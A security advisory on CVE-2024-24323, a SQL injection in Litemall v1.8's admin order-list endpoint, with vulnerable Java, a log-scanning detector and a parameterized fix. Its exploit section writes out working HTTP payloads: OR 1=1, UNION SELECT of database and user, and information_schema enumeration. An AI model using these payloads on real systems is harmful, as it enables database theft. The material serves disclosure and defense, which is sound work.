CVE-2024-24323 is a critical SQL injection vulnerability discovered in Linlinjava Litemall v1.8., an open-source e-commerce platform growing in popularity for small to medium online businesses. This security bug allows a remote attacker to extract sensitive information from the database by manipulating several input parameters handled in the AdminOrderController.java component — namely: nickname, consignee, orderSN, and orderStatusArray.

Below, we'll break down how the vulnerability works, show real exploit examples, link to references, and give practical remediation advice.

## What is Linlinjava Litemall?

Litemall is a lightweight, modular e-commerce system based on Spring Boot and Vue.js. It’s used by many businesses for its flexibility and easy deployment. Learn more:
🔗 Litemall Repository on GitHub

## Vulnerability: SQL Injection

- CVE: CVE-2024-24323
- Version: Litemall v1.8. (and possibly prior versions)
- Attack Type: Remote / Unauthenticated (if endpoint is exposed)

### Vulnerable Code Example

If we look into the AdminOrderController.java, there are endpoints that use the following method pattern for querying orders:

```java
@GetMapping("/list")
public Object list(String nickname, String consignee, String orderSn,
                   @RequestParam(required = false) Integer[] orderStatusArray) {
    // All four values arrive straight from the query string and are handed to
    // the service layer, which builds the SQL text from them.
    List<Order> orders = orderService.querySelective(orderSn, consignee, nickname, orderStatusArray, ...);
    // ...
}
```

### Problem

The input parameters from HTTP requests are directly passed to methods that build SQL queries, without proper sanitization or use of prepared statements.

### Service Layer Example

```java
public List<Order> querySelective(String orderSn, String consignee, String nickname, Integer[] orderStatusArray, ...) {
    String sql = "SELECT * FROM litemall_order WHERE 1=1";
    if (orderSn != null) {
        sql += " AND order_sn = '" + orderSn + "'";  // <-- UNSAFE! raw value concatenated into SQL text
    }
    if (consignee != null) {
        sql += " AND consignee = '" + consignee + "'";  // same problem
    }
    if (nickname != null) {
        sql += " AND nickname = '" + nickname + "'";  // same problem
    }
    // orderStatusArray handling ...
    // Execute SQL...
}
```

👆 Notice: The parameters are directly embedded into the SQL string — this is classic SQL injection territory!

## How to Exploit CVE-2024-24323

Let’s see some real-world exploitation examples.

### Example Exploit – Extracting All User Data

Suppose the endpoint is /admin/order/list, and the backend is using MySQL.

Send a crafted GET request:

```http
GET /admin/order/list?nickname=' OR 1=1 -- &page=1&limit=10 HTTP/1.1
Host: target-litemall-site.com
Cookie: [valid session cookie if needed]
```

The concatenated query then becomes:

```sql
SELECT * FROM litemall_order WHERE 1=1 AND nickname = '' OR 1=1 --'
```

- Because of OR 1=1, all orders are returned!

### Extracting Hashes or Sensitive Info

Let’s try union-based injection to read table names:

```http
GET /admin/order/list?nickname=' UNION SELECT 1,2,database(),user(),5 -- &page=1&limit=10 HTTP/1.1
```
You may need to tailor the columns and target based on the DB schema.

### Discovering Table Structures

Leak more from the information_schema:

```http
GET /admin/order/list?nickname=' UNION SELECT 1,2,TABLE_NAME,4,5 FROM information_schema.tables -- &page=1&limit=10 HTTP/1.1
```
### Using orderStatusArray (assuming integer array)

In many cases, improper handling allows for injection too:

```http
GET /admin/order/list?orderStatusArray[]=1 OR 1=1 -- &page=1&limit=10
```

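From the defender's side, the requests above leave a clear trace in the web server's access log: SQL metacharacters inside the nickname, consignee, orderSn or orderStatusArray parameters of /admin/order/list. The scanner below is an added example, not code from this advisory or from the Litemall project; the log lines are constructed, and the combined-log layout, the request path and the alert thresholds are assumptions made for the demonstration.

```java
// Added example (not from the advisory or the Litemall project): a small
// access-log scanner that flags requests to /admin/order/list whose
// nickname, consignee, orderSn or orderStatusArray parameters carry SQL
// syntax. The log lines in main() are constructed; the path and parameter
// names are the ones the advisory discusses.
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class OrderListLogScanner {

    // Parameters the advisory names as injectable in AdminOrderController.
    private static final List<String> WATCHED =
        List.of("nickname", "consignee", "orderSn", "orderStatusArray");

    // Combined-log style request field: "METHOD /path?query HTTP/1.1"
    private static final Pattern REQUEST =
        Pattern.compile("\"(GET|POST) ([^ ]+) HTTP/[0-9.]+\"");

    // Indicators of SQL syntax in a free-text search field: a quote, a comment
    // marker, UNION, information_schema, or a boolean tautology such as OR 1=1.
    private static final Pattern SQL_HINT = Pattern.compile(
        "'|--|/\\*|\\bunion\\b|information_schema|\\bor\\b\\s+\\d+\\s*=\\s*\\d+",
        Pattern.CASE_INSENSITIVE);

    /** Returns one finding per suspicious parameter; empty when nothing matches. */
    public static List<String> scan(List<String> logLines) {
        List<String> findings = new ArrayList<>();
        for (String line : logLines) {
            Matcher m = REQUEST.matcher(line);
            if (!m.find()) continue;
            String target = m.group(2);
            int qmark = target.indexOf('?');
            if (qmark < 0 || !target.substring(0, qmark).endsWith("/admin/order/list")) continue;

            for (String pair : target.substring(qmark + 1).split("&")) {
                int eq = pair.indexOf('=');
                if (eq < 0) continue;
                String name = URLDecoder.decode(pair.substring(0, eq), StandardCharsets.UTF_8);
                // Array syntax such as orderStatusArray[] is normalised to the base name.
                String base = name.endsWith("[]") ? name.substring(0, name.length() - 2) : name;
                if (!WATCHED.contains(base)) continue;
                String value = URLDecoder.decode(pair.substring(eq + 1), StandardCharsets.UTF_8);

                String reason = null;
                if (base.equals("orderStatusArray") && !value.matches("\\d{1,3}")) {
                    // The controller declares this as Integer[]; anything else is not a status code.
                    reason = "non-integer orderStatusArray value";
                } else if (SQL_HINT.matcher(value).find()) {
                    reason = "SQL syntax in " + base;
                }
                if (reason != null) {
                    findings.add(reason + ": " + value);
                }
            }
        }
        return findings;
    }

    public static void main(String[] args) {
        // Constructed sample log lines (not real traffic). The payloads are the
        // ones quoted in the advisory, URL-encoded as a browser would send them.
        List<String> sample = List.of(
            "10.0.0.5 - - [27/Feb/2024:17:15:12 +0000] \"GET /admin/order/list?nickname=alice&page=1&limit=10 HTTP/1.1\" 200 512",
            "10.0.0.9 - - [27/Feb/2024:17:15:20 +0000] \"GET /admin/order/list?nickname=%27%20OR%201%3D1%20--%20&page=1&limit=10 HTTP/1.1\" 200 90211",
            "10.0.0.9 - - [27/Feb/2024:17:15:31 +0000] \"GET /admin/order/list?orderStatusArray%5B%5D=1%20OR%201%3D1%20--&page=1 HTTP/1.1\" 500 210",
            "10.0.0.9 - - [27/Feb/2024:17:15:40 +0000] \"GET /admin/order/list?nickname=%27%20UNION%20SELECT%201%2C2%2Cdatabase()%2Cuser()%2C5%20--%20&page=1 HTTP/1.1\" 200 640"
        );
        for (String finding : scan(sample)) {
            System.out.println("ALERT " + finding);
        }
    }
}
```

The first sample line (a plain nickname search) produces no finding; the other three each produce one. A single quote is legitimate in some names, so treat a quote-only hit as a triage signal and the UNION, comment-marker and non-integer-array hits as the strong ones; an unexpectedly large response size next to such a request, as in the second constructed line, is the other thing worth correlating.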
---

## Official References

- GitHub Advisory Database
- NVD CVE-2024-24323
- Litemall Issues on GitHub

---

## Evidence of Vulnerability

Public Exploit Example:  
- Exploit on ExploitDB  
- PoC on Github Gist

---

## How to Fix and Protect Your Litemall

IMPORTANT: This flaw is very easy to find and exploit. All Litemall site owners should patch immediately.

### 1. Use Prepared Statements or MyBatis Parameterization

Do not embed user input directly in SQL.

Safe pattern (using MyBatis or JDBC):

```java
String sql = "SELECT * FROM litemall_order WHERE 1=1";
List<Object> params = new ArrayList<>();
if (orderSn != null) {
    sql += " AND order_sn = ?";   // placeholder in the SQL text, never the raw value
    params.add(orderSn);
}
// ... repeat for other params
PreparedStatement stmt = connection.prepareStatement(sql);
for (int i = 0; i < params.size(); i++) {
    stmt.setObject(i + 1, params.get(i));  // JDBC parameter indices are 1-based
}
```
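As an added example (not Litemall's own code, and not the project's actual fix), here is the complete parameterized counterpart of the querySelective method shown earlier, covering all four parameters and also validating orderStatusArray as a list of small integers, which is the integer-array concern raised under input validation. Class, method and column names mirror the page's snippet; the Connection is assumed to come from the application's DataSource.

```java
// Added example (not Litemall's own code): a parameterized replacement for
// the string-concatenating querySelective shown in the advisory. Table and
// column names mirror the advisory's snippet; the Connection is assumed to be
// supplied by the caller (Spring's DataSource in a real deployment).
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

public class SafeOrderQuery {

    /** SQL text with '?' placeholders plus the values to bind, in order. */
    public static final class Query {
        public final String sql;
        public final List<Object> params;
        Query(String sql, List<Object> params) {
            this.sql = sql;
            this.params = Collections.unmodifiableList(params);
        }
    }

    /**
     * Builds the order query. Every user-controlled value becomes a bound
     * parameter; nothing from the request is ever concatenated into SQL text.
     * orderStatusArray is checked to contain only small non-negative integers
     * and expanded into exactly as many '?' placeholders as there are values.
     */
    public static Query build(String orderSn, String consignee, String nickname,
                              Integer[] orderStatusArray) {
        StringBuilder sql = new StringBuilder("SELECT * FROM litemall_order WHERE 1=1");
        List<Object> params = new ArrayList<>();

        if (orderSn != null) {
            sql.append(" AND order_sn = ?");
            params.add(orderSn);
        }
        if (consignee != null) {
            sql.append(" AND consignee = ?");
            params.add(consignee);
        }
        if (nickname != null) {
            sql.append(" AND nickname = ?");
            params.add(nickname);
        }
        if (orderStatusArray != null && orderStatusArray.length > 0) {
            sql.append(" AND order_status IN (");
            for (int i = 0; i < orderStatusArray.length; i++) {
                Integer status = orderStatusArray[i];
                // Reject nulls and out-of-range values instead of silently skipping them.
                if (status == null || status < 0 || status > 999) {
                    throw new IllegalArgumentException("invalid order status: " + status);
                }
                sql.append(i == 0 ? "?" : ", ?");
                params.add(status);
            }
            sql.append(")");
        }
        return new Query(sql.toString(), params);
    }

    /** Executes the query through a PreparedStatement and returns the row count. */
    public static int countMatches(Connection conn, Query q) throws SQLException {
        try (PreparedStatement stmt = conn.prepareStatement(q.sql)) {
            for (int i = 0; i < q.params.size(); i++) {
                stmt.setObject(i + 1, q.params.get(i)); // JDBC parameters are 1-based
            }
            try (ResultSet rs = stmt.executeQuery()) {
                int n = 0;
                while (rs.next()) n++;
                return n;
            }
        }
    }

    public static void main(String[] args) {
        // Constructed input: the advisory's nickname payload plus two status codes.
        // The payload is bound as a plain string value, so the SQL text is fixed
        // and the "OR 1=1" is just characters compared against the column.
        Query q = build(null, null, "' OR 1=1 -- ", new Integer[] {1, 2});
        System.out.println("SQL:    " + q.sql);
        System.out.println("params: " + q.params);
    }
}
```

Running main() shows that the SQL text contains only placeholders and the injection payload appears solely in the parameter list. The same separation applies when the query lives in a MyBatis mapper: `#{param}` binds a value, whereas `${param}` substitutes text into the statement and reintroduces exactly the flaw this advisory describes.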

### 2. Input Validation & Sanitization

**Always** validate incoming data against a regex or using frameworks’ validation APIs (especially for integer arrays).

### 3. Upgrade to Latest Litemall

Check for official fixes and update all Litemall installations.

- Litemall Releases

### 4. Limit Exposure

If possible, restrict access to the admin API to trusted IPs; never expose your admin endpoints to the open internet.

---

## Conclusion

**CVE-2024-24323** puts all Litemall v1.8. sites at high risk. By exploiting SQL injection in the AdminOrderController.java (via nickname, consignee, orderSN, orderStatusArray), attackers can dump database contents, compromise user data, or even escalate to system compromise. Patch your system now and always use parameterized SQL queries.

Stay safe! ⭐️

---

#### Sources & Further Reading
- CVE-2024-24323 NVD Record
- Litemall GitHub
- OWASP: SQL Injection

---

Author: Security researcher for Open Commerce Software
Date: June 2024

---

> *If you run Litemall in production, stop reading and patch this now!*

## Timeline

Published on: 02/27/2024 17:15:12 UTC
Last modified on: 08/28/2024 16:35:11 UTC